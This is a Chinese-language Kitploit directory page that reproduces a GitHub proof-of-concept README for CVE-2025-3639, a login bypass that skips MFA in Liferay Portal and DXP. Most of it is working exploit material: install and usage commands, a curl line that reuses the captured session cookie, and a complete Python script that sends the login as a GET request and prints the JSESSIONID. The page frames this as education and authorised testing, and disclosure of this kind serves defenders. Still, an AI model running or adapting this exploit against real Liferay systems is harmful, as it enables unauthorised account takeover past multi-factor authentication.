Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-3639 — Liferay Portal(版本 7.3.0–7.4.3.132)和 Liferay DXP(从 2024.Q1 到 2025.Q1.6 的多个版本)中的登录绕过漏洞 | Kitploit
工具/GitHubGitHub/6lj/cve-2025-3639
身份验证与授权漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHub6lj/cve-2025-3639

CVE-2025-3639

Liferay Portal(版本 7.3.0–7.4.3.132)和 Liferay DXP(从 2024.Q1 到 2025.Q1.6 的多个版本)中的登录绕过漏洞

查看仓库
211个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-3639 PoC - Liferay Portal/DXP 登录绕过

该仓库包含 CVE-2025-3639 的概念验证 (PoC),这是 Liferay Portal(版本 7.3.0–7.4.3.132)和 Liferay DXP(从 2024.Q1 到 2025.Q1.6 的多个版本)中的一个登录绕过漏洞。该 PoC 演示了拥有有效凭据的未认证用户如何通过将 POST 请求修改为 GET 请求来绕过多因素认证 (MFA),从而可能获得对用户帐户的未授权访问。

警告:此 PoC 仅用于教育目的。对该漏洞的未授权测试或利用是非法且不道德的。仅在获得系统所有者明确书面许可的情况下使用。

要求

  • 环境:Linux(例如 Kali Linux、Ubuntu 或虚拟化环境)。
  • 依赖项:
    root@kitploit:~
    sudo apt-get update
    sudo apt-get install python3 python3-requests
    pip3 install requests
    
  • 网络:能够访问目标 Liferay Portal/DXP 实例(必须在经明确许可的测试环境中)。
  • 凭据:目标 Liferay 实例的有效用户凭据。

安装

  1. 克隆仓库:

    root@kitploit:~
    git clone https://github.com/6lj/CVE-2025-3639.git
    cd CVE-2025-3639
    
  2. 确保已安装 Python 3 和 requests 库:

    root@kitploit:~
    pip3 install requests
    

功能说明

  • 该 PoC 通过将登录 POST 请求修改为 GET 请求来利用 CVE-2025-3639,从而绕过 MFA 检查。
  • 它发送一个带有有效凭据的精心构造的 HTTP GET 请求,在没有完成 MFA 流程的情况下进行认证。
  • 该脚本旨在受控、授权的环境中演示该漏洞。

使用方法

使用适当的参数运行 PoC 脚本(将 <target_url>、<username> 和 <password> 替换为目标 Liferay 实例 URL 和有效凭据)。

poc.py

root@kitploit:~
python3 poc.py --target <target_url> --username <username> --password <password>
  • 参数:
    • --target:Liferay Portal/DXP 实例的 URL(例如 http://example.com)。
    • --username:目标实例的有效用户名。
    • --password:该用户名的有效密码。

示例

root@kitploit:~
python3 poc.py --target http://192.168.1.100 --username [email protected] --password Test123!

验证结果

  • 成功:如果漏洞利用成功,脚本将返回一个有效的会话令牌或一条指示已无需 MFA 即可访问用户帐户的成功消息。

    root@kitploit:~
    curl -b "COOKIE=<session_token>" http://<target_url>/api/jsonws/user/get-current-user
    
    • 预期输出:用户详细信息,确认认证成功。
  • 失败:如果服务器返回错误(例如 401 Unauthorized 或 403 Forbidden),则该实例可能不易受攻击,或者 MFA 未启用。

  • 监控流量:使用 Wireshark 等工具检查 HTTP 流量:

    root@kitploit:~
    sudo wireshark -f "tcp port 80 or tcp port 443"
    

PoC 脚本

以下是 poc.py 的示例代码:

root@kitploit:~
import requests
import argparse

def exploit(target, username, password):
    print(f"[*] Attempting CVE-2025-3639 exploit on {target}")
    login_url = f"{target}/c/portal/login"

    params = {
        "p_auth": "",
        "login": username,
        "password": password
    }
    
    try:
        response = requests.get(login_url, params=params, allow_redirects=True)
        if response.status_code == 200 and "JSESSIONID" in response.cookies:
            print(f"[+] Success! Session token: {response.cookies['JSESSIONID']}")
            return True
        else:
            print(f"[-] Failed: {response.status_code} - {response.text}")
            return False
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2025-3639 PoC for Liferay Portal/DXP")
    parser.add_argument("--target", required=True, help="Target Liferay URL (e.g., http://example.com)")
    parser.add_argument("--username", required=True, help="Valid username")
    parser.add_argument("--password", required=True, help="Valid password")
    args = parser.parse_args()
    
    exploit(args.target, args.username, args.password)

重要说明

  • 此 PoC 需要有效凭据,因为该漏洞允许绕过 MFA,但不能猜测凭据。
  • 仅在受控环境中且经系统所有者明确许可的情况下进行测试。
  • 该漏洞已在较新版本的 Liferay Portal/DXP 中修复。请更新至最新版本以缓解此问题。
  • Liferay 安全公告
  • NVD CVE-2025-3639
  • GitHub 仓库

免责声明

本项目仅用于教育目的。作者不对此 PoC 的任何未授权或非法使用负责。在测试前始终获取系统所有者的明确许可。

下载工具